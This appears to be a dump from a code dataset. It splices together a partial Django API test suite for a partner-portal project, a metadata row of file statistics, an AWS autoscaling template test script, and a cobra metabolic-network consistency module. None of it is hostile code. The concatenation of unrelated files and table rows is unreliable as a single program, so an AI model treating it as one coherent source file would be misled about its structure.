'justification': 'Explain justification for creating direct selection',
'focal_points': focal_points,
'description': 'Provide brief background of the project',
'other_information': '',
'start_date': str(start_date),
'end_date': str(end_date),
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
eoi = EOI.objects.last()
self.assertEquals(EOI.objects.count(), 1)
self.assertEquals(eoi.other_information, payload['other_information'])
self.assertEquals(eoi.description, payload['description'])
self.assertEquals(eoi.start_date, start_date)
self.assertEquals(eoi.end_date, end_date)
self.assertEquals(eoi.display_type, CFEI_TYPES.direct)
self.assertEquals(eoi.status, CFEI_STATUSES.open)
self.assertEquals(eoi.focal_points.all().count(), len(focal_points))
self.assertEquals(eoi.created_by, self.user)
self.assertEquals(Application.objects.count(), 2)
# try to convert again
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_400_BAD_REQUEST)
self.assertEquals(response.data['non_field_errors'], [ConvertUnsolicitedSerializer.RESTRICTION_MSG])
class TestReviewSummaryAPIViewAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def test_add_review(self):
url = reverse('common:file')
filename = os.path.join(settings.PROJECT_ROOT, 'apps', 'common', 'tests', 'test.doc')
with open(filename) as doc:
payload = {
"file_field": doc
}
response = self.client.post(url, data=payload, format='multipart')
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
self.assertIsNotNone(response.data['id'])
file_id = response.data['id']
PartnerMemberFactory() # eoi is creating applications that need partner member
eoi = OpenEOIFactory(created_by=self.user)
url = reverse('projects:review-summary', kwargs={"pk": eoi.id})
payload = {
'review_summary_comment': "comment",
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
self.assertEquals(response.data['review_summary_comment'], payload['review_summary_comment'])
payload = {
'review_summary_comment': "comment2",
'review_summary_attachment': None
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(
response.data['review_summary_comment'], payload['review_summary_comment']
)
payload = {
'review_summary_comment': "comment3",
'review_summary_attachment': file_id
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['review_summary_comment'], payload['review_summary_comment'])
self.assertTrue(
response.data['review_summary_attachment'].find(CommonFile.objects.get(pk=file_id).file_field.url) > 0
)
class TestInvitedPartnersListAPIView(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
def test_serializes_same_fields_on_get_and_patch(self):
eoi = OpenEOIFactory(created_by=self.user)
url = reverse('projects:eoi-detail', kwargs={"pk": eoi.id})
read_response = self.client.get(url)
self.assertResponseStatusIs(read_response)
update_response = self.client.patch(url, {
'title': 'Another title'
})
self.assertResponseStatusIs(update_response)
self.assertEqual(set(read_response.data.keys()), set(update_response.data.keys()))
class TestEOIReviewersAssessmentsNotifyAPIView(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
quantity = 1
def setUp(self):
super(TestEOIReviewersAssessmentsNotifyAPIView, self).setUp()
PartnerSimpleFactory()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity)
def test_send_notification(self):
eoi = EOI.objects.first()
eoi.reviewers.add(self.user)
url = reverse('projects:eoi-reviewers-assessments-notify', kwargs={
"eoi_id": eoi.id, "reviewer_id": self.user.id
})
create_notification_response = self.client.post(url)
self.assertEqual(
create_notification_response.status_code, status.HTTP_201_CREATED,
msg=create_notification_response.content
)
notifications_response = self.client.get('/api/notifications/')
self.assertEqual(notifications_response.status_code, status.HTTP_200_OK)
self.assertEqual(notifications_response.data['count'], 1)
self.assertEqual(
notifications_response.data['results'][0]['notification']['source'], NotificationType.CFEI_REVIEW_REQUIRED
)
create_notification_response = self.client.post(url)
self.assertEqual(create_notification_response.status_code, status.HTTP_200_OK)
self.assertIn('success', create_notification_response.json())
with mock.patch('notification.helpers.timezone.now') as mock_now:
mock_now.return_value = eoi.created + relativedelta(hours=25)
create_notification_response = self.client.post(url)
self.assertEqual(create_notification_response.status_code, status.HTTP_201_CREATED)
class TestLocationRequiredOnCFEICreate(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestLocationRequiredOnCFEICreate, self).setUp()
office = self.user.agency_members.first().office
self.base_payload = {
"specializations": [
24
],
"assessments_criteria": [
{
"selection_criteria": "LEP",
"description": "asdasdasdasd"
}
],
"title": "asdasdasd",
"focal_points": [
self.user.id
],
"description": "asdasdas",
"goal": "asdasdsa",
"clarification_request_deadline_date": date.today(),
"deadline_date": date.today() + relativedelta(days=1),
"notif_results_date": date.today() + relativedelta(days=2),
"start_date": date.today() + relativedelta(days=10),
"end_date": date.today() + relativedelta(days=20),
"has_weighting": False,
"locations": [
{
"admin_level_1": {
"country_code": "CV"
},
}
],
"agency": office.agency.id,
"agency_office": office.id,
}
def test_create_required(self):
payload = self.base_payload.copy()
url = reverse('projects:open')
create_response = self.client.post(url, data=payload)
self.assertResponseStatusIs(create_response, status.HTTP_400_BAD_REQUEST)
self.assertIn('locations', create_response.data)
payload["locations"][0]['admin_level_1']['name'] = 'asd'
create_response = self.client.post(url, data=payload)
self.assertResponseStatusIs(create_response, status.HTTP_400_BAD_REQUEST)
self.assertIn('locations', create_response.data)
payload["locations"][0]['lat'] = "14.95639"
payload["locations"][0]['lon'] = "-23.62782"
create_response = self.client.post(url, data=payload)
self.assertResponseStatusIs(create_response, status.HTTP_201_CREATED)
def test_create_with_optional_location(self):
payload = self.base_payload.copy()
url = reverse('projects:open')
payload["locations"] = [
{
"admin_level_1": {
"country_code": "PS"
},
}
]
create_response = self.client.post(url, data=payload)
self.assertEqual(create_response.status_code, status.HTTP_201_CREATED)
def test_multiple_locations(self):
payload = self.base_payload.copy()
url = reverse('projects:open')
payload["locations"] = [
{
"admin_level_1": {
"country_code": "CV",
"name": "ASD",
},
'lat': "14.95639",
'lon': "-23.62782"
},
{
"admin_level_1": {
"country_code": "PS"
},
}
]
create_response = self.client.post(url, data=payload)
self.assertEqual(create_response.status_code, status.HTTP_201_CREATED)
@mock.patch('partner.models.Partner.profile_is_complete', lambda _: True)
def test_create_application(self):
eoi = OpenEOIFactory(agency=self.user.agency)
apply_url = reverse('projects:partner-applications', kwargs={'pk': eoi.pk})
partner = PartnerFactory()
user = PartnerMemberFactory(partner=partner).user
self.client.force_login(user)
apply_response = self.client.post(apply_url, data={
'cn': get_new_common_file().id
})
self.assertResponseStatusIs(apply_response, status.HTTP_201_CREATED)
class TestDirectSelectionTestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
quantity = 2
initial_factories = [
AgencyFactory,
AgencyOfficeFactory,
UserFactory,
PartnerFactory,
]
def setUp(self):
super(TestDirectSelectionTestCase, self).setUp()
for partner in Partner.objects.all():
PartnerMemberFactory.create_batch(5, partner=partner)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_create_direct(self):
office = self.user.agency_members.first().office
partners = Partner.objects.all()[:2]
partner1, partner2 = partners
focal_point = AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user
direct_selection_payload = {
"applications": [
{
"partner": partner1.id,
"ds_justification_select": ["Loc"],
"justification_reason": "123123"
}, {
"partner": partner2.id,
"ds_justification_select": ["Loc"],
"justification_reason": "1231231241245125"
}],
"eoi": {
"countries": [
{
"country": "FR",
"locations": [{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}]
}
],
"specializations": [28, 27],
"title": "1213123",
"focal_points": [focal_point.id],
"description": "123123123",
"goal": "123123123",
"start_date": date.today() + relativedelta(days=1),
"end_date": date.today() + relativedelta(days=15),
"country_code": ["FR"],
"locations": [
{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}
],
"agency": office.agency.id,
"agency_office": office.id
}}
url = reverse('projects:direct')
response = self.client.post(url, data=direct_selection_payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
for partner in partners:
PartnerVerificationFactory(partner=partner, submitter=self.user)
response = self.client.post(url, data=direct_selection_payload)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('applications', response.data)
direct_selection_payload['applications'].pop()
response = self.client.post(url, data=direct_selection_payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_201_CREATED)
self.assertFalse(response.data['eoi']['sent_for_publishing'])
self.assertFalse(response.data['eoi']['is_published'])
call_command('send_daily_notifications')
selection_emails = list(filter(
lambda msg: NOTIFICATION_DATA[NotificationType.DIRECT_SELECTION_INITIATED]['subject'] in msg.body,
mail.outbox
))
self.assertEqual(len(selection_emails), 0)
mail.outbox = []
partner1_application = partner1.applications.first()
publish_url = reverse('projects:eoi-publish', kwargs={'pk': partner1_application.eoi_id})
self.assertResponseStatusIs(self.client.post(publish_url))
call_command('send_daily_notifications')
selection_emails = list(filter(
lambda msg: NOTIFICATION_DATA[NotificationType.DIRECT_SELECTION_INITIATED]['subject'] in msg.body,
mail.outbox
))
self.assertEqual(len(selection_emails), User.objects.filter(partner_members__partner=partner1).count())
application_url = reverse('projects:application', kwargs={'pk': partner1_application.pk})
accept_payload = {
"did_accept": True,
"did_decline": False
}
update_response = self.client.patch(application_url, data=accept_payload)
self.assertResponseStatusIs(update_response)
call_command('send_daily_notifications')
notification_emails = list(filter(
lambda msg: NOTIFICATION_DATA[NotificationType.CFEI_APPLICATION_WIN]['subject'] in msg.body,
mail.outbox
))
self.assertTrue(len(notification_emails) > 0)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_direct(self):
office = self.user.agency_members.first().office
partner = Partner.objects.first()
direct_selection_payload = {
"applications": [
{
"partner": partner.id,
"ds_justification_select": ["Loc"],
"justification_reason": "123123"
}
],
"eoi": {
"countries": [
{
"country": "FR",
"locations": [{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}]
}
],
"specializations": [28, 27],
"title": "1213123",
"focal_points": [
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office).user.id,
],
"description": "123123123",
"goal": "123123123",
"start_date": date.today() + relativedelta(days=10),
"end_date": date.today() + relativedelta(days=20),
"country_code": ["FR"],
"locations": [
{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}
],
"agency": office.agency.id,
"agency_office": office.id
}
}
url = reverse('projects:direct')
PartnerVerificationFactory(partner=partner, submitter=self.user)
response = self.client.post(url, data=direct_selection_payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_201_CREATED)
project_id = partner.applications.first().eoi_id
publish_url = reverse('projects:eoi-publish', kwargs={'pk': project_id})
self.assertResponseStatusIs(self.client.post(publish_url))
project_url = reverse('projects:eoi-detail', kwargs={'pk': project_id})
patch_payload = {
'title': 'new title ASD'
}
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
self.assertEqual(patch_payload['title'], patch_response.data['title'])
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_locations_issue_direct(self):
project = DirectEOIFactory(created_by=self.user)
project_url = reverse('projects:eoi-detail', kwargs={'pk': project.pk})
patch_payload = {
"locations": [
{
"admin_level_1": {
"name": "Elbasan County",
"country_code": "AL"
},
"lat": "41.18271",
"lon": "20.29838"
},
{
"admin_level_1": {
"name": "Gjirokastër County",
"country_code": "AL"
},
"lat": "40.38413",
"lon": "20.38627"
},
{
"admin_level_1": {
"name": "Fier County",
"country_code": "AL"
},
"lat": "40.58468",
"lon": "19.77104"
}
],
}
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
patch_response = self.client.patch(project_url, data={
'locations': patch_response.data['locations']
})
self.assertResponseStatusIs(patch_response)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_attachments(self):
project = OpenEOIFactory(created_by=self.user)
project_url = reverse('projects:eoi-detail', kwargs={'pk': project.pk})
project_response = self.client.get(project_url)
self.assertResponseStatusIs(project_response)
patch_payload = {
"attachments": project_response.data['attachments'] + [
{
'description': 'Test Description',
'file': get_new_common_file().pk
},
],
}
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
self.assertEqual(
len(patch_response.data['attachments']),
len(patch_payload['attachments']),
)
for attachment in patch_payload['attachments']:
attachment['description'] = 'TEST'
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
for attachment in patch_response.data['attachments']:
self.assertEqual(attachment['description'], 'TEST')
patch_payload['attachments'].pop(0)
patch_response = self.client.patch(project_url, patch_payload)
self.assertResponseStatusIs(patch_response)
self.assertEqual(
len(patch_response.data['attachments']),
len(patch_payload['attachments']),
)
class TestEOIPublish(BaseAPITestCase):
quantity = 1
user_type = BaseAPITestCase.USER_AGENCY
partner_role = AgencyRole.READER
initial_factories = [
AgencyFactory,
AgencyOfficeFactory,
UserFactory,
AgencyMemberFactory,
PartnerFactory,
OpenEOIFactory,
]
def test_publish_permission(self):
eoi = EOI.objects.first()
url = reverse('projects:eoi-publish', kwargs={'pk': eoi.pk})
response = self.client.post(url)
self.assertResponseStatusIs(response, status.HTTP_403_FORBIDDEN)
self.set_current_user_role(AgencyRole.EDITOR_ADVANCED.name)
response = self.client.post(url)
self.assertResponseStatusIs(response, status.HTTP_403_FORBIDDEN)
eoi.created_by = self.user
eoi.deadline_date = date.today() + relativedelta(days=7)
eoi.save()
response = self.client.post(url)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
eoi.refresh_from_db()
self.assertTrue(eoi.is_published)
self.assertEqual(eoi.status, CFEI_STATUSES.open)
class TestUCNCreateAndPublish(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
agency_role = PartnerRole.EDITOR
initial_factories = [
AgencyFactory,
AgencyOfficeFactory,
UserFactory,
AgencyMemberFactory,
PartnerFactory,
PartnerMemberFactory,
]
def setUp(self):
super(TestUCNCreateAndPublish, self).setUp()
self.base_payload = {
"locations": [
{
"admin_level_1": {
"name": "Île-de-France",
"country_code": "FR"
},
"lat": "48.45289",
"lon": "2.65182"
}
],
'title': 'Save stuff',
'agency': Agency.objects.order_by('?').first().id,
"specializations": [
s.id for s in Specialization.objects.order_by('?')[:2]
],
'cn': get_new_common_file().id
}
def test_ucn_create_and_publish(self):
payload = self.base_payload.copy()
url = reverse('projects:applications-unsolicited')
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
ucn = Application.objects.get(id=response.data['id'])
self.assertEqual(ucn.application_status, EXTENDED_APPLICATION_STATUSES.draft)
publish_url = reverse('projects:ucn-manage', kwargs={'pk': ucn.pk})
self.set_current_user_role(PartnerRole.READER.name)
publish_response = self.client.post(publish_url)
self.assertResponseStatusIs(publish_response, status.HTTP_403_FORBIDDEN)
self.set_current_user_role(PartnerRole.EDITOR.name)
publish_response = self.client.post(publish_url)
self.assertResponseStatusIs(publish_response, status.HTTP_200_OK)
ucn.refresh_from_db()
self.assertEqual(ucn.application_status, EXTENDED_APPLICATION_STATUSES.review)
def test_ucn_create_and_update(self):
payload = self.base_payload.copy()
url = reverse('projects:applications-unsolicited')
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
ucn = Application.objects.get(id=response.data['id'])
self.assertEqual(ucn.application_status, EXTENDED_APPLICATION_STATUSES.draft)
manage_url = reverse('projects:ucn-manage', kwargs={'pk': ucn.pk})
new_cn = get_new_common_file()
update_response = self.client.patch(manage_url, data={
'cn': new_cn.id
})
self.assertResponseStatusIs(update_response)
new_locations_payload = {
'locations': [
{
"admin_level_1": {"name": "Baghdad", "country_code": 'IQ'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
}
update_response = self.client.patch(manage_url, data=new_locations_payload)
self.assertResponseStatusIs(update_response)
self.assertEqual(len(update_response.data['locations']), 2)
partial_update_payload = {
'locations': update_response.data['locations'] + [{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
}]
}
update_response = self.client.patch(manage_url, data=partial_update_payload)
self.assertResponseStatusIs(update_response)
self.assertEqual(len(update_response.data['locations']), 3)
def test_locations_issue(self):
payload = {
"specializations": [
35
],
"agency": Agency.objects.order_by('?').first().id,
"title": "testucn",
"cn": get_new_common_file().id,
"country_code": [
"AF"
],
"locations": [
{
"admin_level_1": {
"name": "Samangan",
"country_code": "AF"
},
"lat": "35.88378",
"lon": "68.12125"
},
{
"admin_level_1": {
"name": "Ghor",
"country_code": "AF"
},
"lat": "33.46268",
"lon": "65.00114"
}
]
}
url = reverse('projects:applications-unsolicited')
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
ucn = Application.objects.get(id=response.data['id'])
manage_url = reverse('projects:ucn-manage', kwargs={'pk': ucn.pk})
update_payload = {
"title": "testucnsdsd",
"agency": Agency.objects.order_by('?').first().id,
"specializations": [
35
],
"country_code": [
"AF"
],
"locations": response.data['locations']
}
update_response = self.client.patch(manage_url, data=update_payload)
self.assertResponseStatusIs(update_response)
class TestEOIPDFExport(BaseAPITestCase):
quantity = 1
user_type = BaseAPITestCase.USER_AGENCY
partner_role = AgencyRole.READER
initial_factories = [
OpenEOIFactory,
]
def test_download_project_pdf(self):
eoi = EOI.objects.first()
url = reverse('projects:eoi-detail', kwargs={'pk': eoi.pk}) + '?export=pdf'
response = self.client.get(url)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
self.assertEqual(response.content_type, 'application/pdf')
class TestFinalizedCFEIDetailsViewPermissions(BaseAPITestCase):
def test_applications_details_view(self):
eoi: EOI = FinalizedEOIFactory(agency=UNICEF.model_instance)
winning_application = eoi.applications.filter(did_win=True).first()
application_url = reverse('projects:application', kwargs={"pk": winning_application.id})
review_summary_url = reverse('projects:review-summary', kwargs={"pk": eoi.id})
reviewers_url = reverse('projects:eoi-reviewers-assessments', kwargs={"eoi_id": eoi.id})
applications_url = reverse('projects:applications', kwargs={"pk": eoi.id})
unicef_member = AgencyMemberFactory(
office=AgencyOfficeFactory(agency=UNICEF.model_instance),
role=AgencyRole.EDITOR_ADVANCED.name
)
with self.login_as_user(unicef_member.user):
application_details_response = self.client.get(application_url)
self.assertResponseStatusIs(application_details_response)
review_summary_response = self.client.get(review_summary_url)
self.assertResponseStatusIs(review_summary_response)
reviewers_response = self.client.get(reviewers_url)
self.assertResponseStatusIs(reviewers_response)
applications_response = self.client.get(applications_url)
self.assertResponseStatusIs(applications_response)
wfp_member = AgencyMemberFactory(
office=AgencyOfficeFactory(agency=WFP.model_instance),
role=AgencyRole.EDITOR_ADVANCED.name
)
with self.login_as_user(wfp_member.user):
application_details_response = self.client.get(application_url)
self.assertResponseStatusIs(application_details_response, status.HTTP_403_FORBIDDEN)
review_summary_response = self.client.get(review_summary_url)
self.assertResponseStatusIs(review_summary_response, status.HTTP_403_FORBIDDEN)
reviewers_response = self.client.get(reviewers_url)
self.assertResponseStatusIs(reviewers_response, status.HTTP_403_FORBIDDEN)
applications_response = self.client.get(applications_url)
self.assertResponseStatusIs(applications_response, status.HTTP_403_FORBIDDEN)
| 40.826802 | 120 | 0.615316 | 6,343 | 64,588 | 6.064323 | 0.082926 | 0.037436 | 0.044923 | 0.019654 | 0.704804 | 0.64184 | 0.586934 | 0.555218 | 0.495711 | 0.472079 | 0 | 0.014822 | 0.271939 | 64,588 | 1,581 | 121 | 40.852625 | 0.803186 | 0.008005 | 0 | 0.510733 | 0 | 0 | 0.131639 | 0.029694 | 0 | 0 | 0 | 0.000633 | 0.163583 | 1 | 0.029608 | false | 0.00074 | 0.020725 | 0 | 0.096965 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad6c52112805a09073f738efcd2fd6e35b2f50f8 | 2,660 | py | Python | aws/amazonia/test/sys_tests/test_sys_autoscaling_leaf.py | linz/Geodesy-Web-Services | d2f52a5beed179f817cbf8040e6c85b623c97fb9 | [
"BSD-3-Clause"
] | 2 | 2018-06-19T04:05:19.000Z | 2020-07-17T02:31:31.000Z | aws/amazonia/test/sys_tests/test_sys_autoscaling_leaf.py | linz/Geodesy-Web-Services | d2f52a5beed179f817cbf8040e6c85b623c97fb9 | [
"BSD-3-Clause"
] | null | null | null | aws/amazonia/test/sys_tests/test_sys_autoscaling_leaf.py | linz/Geodesy-Web-Services | d2f52a5beed179f817cbf8040e6c85b623c97fb9 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python3
from amazonia.classes.asg_config import AsgConfig
from amazonia.classes.amz_autoscaling import AutoscalingLeaf
from amazonia.classes.block_devices_config import BlockDevicesConfig
from amazonia.classes.elb_config import ElbConfig, ElbListenersConfig
from troposphere import Template
def main():
userdata = """
#cloud-config
repo_update: true
repo_upgrade: all
packages:
- httpd
runcmd:
- service httpd start
"""
template = Template()
elb_listeners_config = [
ElbListenersConfig(
instance_port='80',
loadbalancer_port='80',
loadbalancer_protocol='HTTP',
instance_protocol='HTTP',
sticky_app_cookie=[]
),
ElbListenersConfig(
instance_port='8080',
loadbalancer_port='8080',
loadbalancer_protocol='HTTP',
instance_protocol='HTTP',
sticky_app_cookie='JSESSION'
)
]
elb_config = ElbConfig(
elb_health_check='TCP:80',
elb_log_bucket=None,
public_unit=False,
ssl_certificate_id=None,
healthy_threshold=10,
unhealthy_threshold=2,
interval=300,
timeout=30,
elb_listeners_config=elb_listeners_config
)
block_devices_config = [BlockDevicesConfig(device_name='/dev/xvda',
ebs_volume_size='15',
ebs_volume_type='gp2',
ebs_encrypted=False,
ebs_snapshot_id=None,
virtual_name=False)
]
asg_config = AsgConfig(
minsize=1,
maxsize=1,
health_check_grace_period=300,
health_check_type='ELB',
image_id='ami-dc361ebf',
instance_type='t2.nano',
userdata=userdata,
iam_instance_profile_arn=None,
block_devices_config=block_devices_config,
simple_scaling_policy_config=None
)
AutoscalingLeaf(
leaf_title='app1',
template=template,
dependencies=['MyDb:5432'],
elb_config=elb_config,
asg_config=asg_config,
availability_zones=['ap-southeast-2a', 'ap-southeast-2b', 'ap-southeast-2c'],
public_cidr={'name': 'PublicIp', 'cidr': '0.0.0.0/0'},
tree_name='tree',
cd_service_role_arn=None,
public_hosted_zone_name=None,
keypair='INSERT_YOUR_KEYPAIR_HERE'
)
print(template.to_json(indent=2, separators=(',', ': ')))
if __name__ == '__main__':
main()
| 28.602151 | 85 | 0.586466 | 262 | 2,660 | 5.610687 | 0.48855 | 0.032653 | 0.051701 | 0.043537 | 0.080272 | 0.080272 | 0.080272 | 0.080272 | 0.080272 | 0 | 0 | 0.027087 | 0.319925 | 2,660 | 92 | 86 | 28.913043 | 0.785517 | 0.006391 | 0 | 0.076923 | 0 | 0 | 0.1162 | 0.009084 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012821 | false | 0 | 0.064103 | 0 | 0.076923 | 0.012821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad6c9cd967dcc48fb94f9eb7f9f6e7c03c3cbb1a | 5,475 | py | Python | csm4cobra/consistency_analysis.py | migp11/csm4cobra | af1b9ed03935180e936d3faa3b2cb0bf77764255 | [
"MIT"
] | 1 | 2019-07-22T10:08:01.000Z | 2019-07-22T10:08:01.000Z | csm4cobra/consistency_analysis.py | migp11/csm4cobra | af1b9ed03935180e936d3faa3b2cb0bf77764255 | [
"MIT"
] | null | null | null | csm4cobra/consistency_analysis.py | migp11/csm4cobra | af1b9ed03935180e936d3faa3b2cb0bf77764255 | [
"MIT"
] | 1 | 2021-07-02T10:43:51.000Z | 2021-07-02T10:43:51.000Z | import networkx as nx
import pandas as pd
from cobra.flux_analysis import find_blocked_reactions
class UmFinder:
def __init__(self, cobra_model, cc_method='fva', report=True):
self._model = cobra_model
if report:
print("===========================================================")
print("Initializing UmFinder Builder using")
print("Model: %s" % cobra_model.id)
print("- Nº of reactions: %i" % len(self._model.reactions))
print("- Nº of metabolites: %i" % len(self._model.metabolites))
print("\nChecking network consistency (may take some minutes)")
print("Finding blocked reaction using method: %s\n" % cc_method)
self._blocked_reactions = find_blocked_reactions(self.model)
self._gap_metabolites = UmFinder.find_gap_metabolites(self.model, self.blocked_reactions)
self._gap_graph = UmFinder.create_gap_graph(self.model, self._gap_metabolites, self._blocked_reactions)
unconnected_modules = nx.connected_components(self._gap_graph.to_undirected())
self._unconnected_modules = sorted(unconnected_modules, key=lambda x: len(x), reverse=True)
if report:
print("- Nº of blocked reactions: %i" % len(self._blocked_reactions))
print("- Nº of gap metabolites: %i" % len(self._gap_metabolites))
print("- Nº of unconnected modules: %i" % len(self.unconnected_modules))
if len(self.unconnected_modules):
df_ums = self.unconnected_modules_frame()
df_biggest_um = df_ums.node_type[df_ums.um_id == 1]
rxns = df_biggest_um.index[df_biggest_um =='rxn']
mets = df_biggest_um.index[df_biggest_um == 'met']
print("- N of reactions in the biggest unconnected module: %i" % len(rxns))
print("- N of metabolites in the biggest unconnected module: %i" % len(mets))
@property
def model(self):
return self._model
@property
def gap_metabolites(self):
return frozenset(self._gap_metabolites)
@property
def gap_graph(self):
return self._gap_graph
@property
def blocked_reactions(self):
return frozenset(self._blocked_reactions)
@property
def unconnected_modules(self):
return self._unconnected_modules
def update(self):
self._blocked_reactions = find_blocked_reactions(self.model)
self._gap_metabolites = UmFinder.find_gap_metabolites(self.model, self.blocked_reactions)
self._gap_graph = UmFinder.create_gap_graph(self.model, self._gap_metabolites, self._blocked_reactions)
self._unconnected_modules = nx.connected_component_subgraphs(self._gap_graph.to_undirected())
self._unconnected_modules = sorted(self._unconnected_modules, key=lambda x: len(x), reverse=True)
def unconnected_module_subgraphs(self):
for um in self.unconnected_modules:
yield self.gap_graph.subgraph(um)
def unconnected_modules_frame(self):
columns = ['node_id', 'node_type', 'um_id']
data = {}
counter = 0
for i, um in enumerate(self.unconnected_modules):
for e in um:
if e in self.gap_metabolites:
e_type = 'met'
elif e in self.blocked_reactions:
e_type = 'rxn'
else:
e_type = None
data[counter] = (e, e_type, i+1)
counter += 1
return pd.DataFrame.from_dict(data, orient='index', columns=columns)
@staticmethod
def find_gap_metabolites(model, blocked_reactions):
gap_metabolites = []
for m in model.metabolites:
reactions = set([r.id for r in m.reactions])
if reactions.issubset(blocked_reactions):
gap_metabolites.append(m.id)
return gap_metabolites
@staticmethod
def create_metabolic_graph(cobra_model, directed=True, reactions=None, rev_rxn_label='reversible'):
graph = nx.DiGraph()
if not directed:
graph = nx.Graph()
if not reactions:
reactions = cobra_model.reactions
if not hasattr(reactions[0], 'id'):
reactions = [cobra_model.reactions.get_by_id(r) for r in reactions]
for r in reactions:
graph.add_node(r.id, label=r.id, text=r.id, node_class="rxn", node_id=r.id)
for m in r.metabolites:
if m.id not in graph.nodes():
graph.add_node(m.id, label=m.id, text=m.id, node_class="met", node_id=m.id)
(tail, head) = (r.id, m.id)
if r.get_coefficient(m) < 0:
(tail, head) = (m.id, r.id)
graph.add_edge(tail, head)
graph[tail][head][rev_rxn_label] = r.lower_bound < 0
return graph
@staticmethod
def create_gap_graph(model, gap_metabolites, blocked_reactions):
if hasattr(gap_metabolites[0], 'id'):
gap_metabolites = [m.id for m in gap_metabolites]
if hasattr(blocked_reactions[0], 'id'):
blocked_reactions = [r.id for r in blocked_reactions]
graph = UmFinder.create_metabolic_graph(model)
gap_graph = graph.subgraph(gap_metabolites + blocked_reactions)
return gap_graph
def main():
model = cobra.test.create_test_model('ecoli')
um_finder = UmFinder(model)
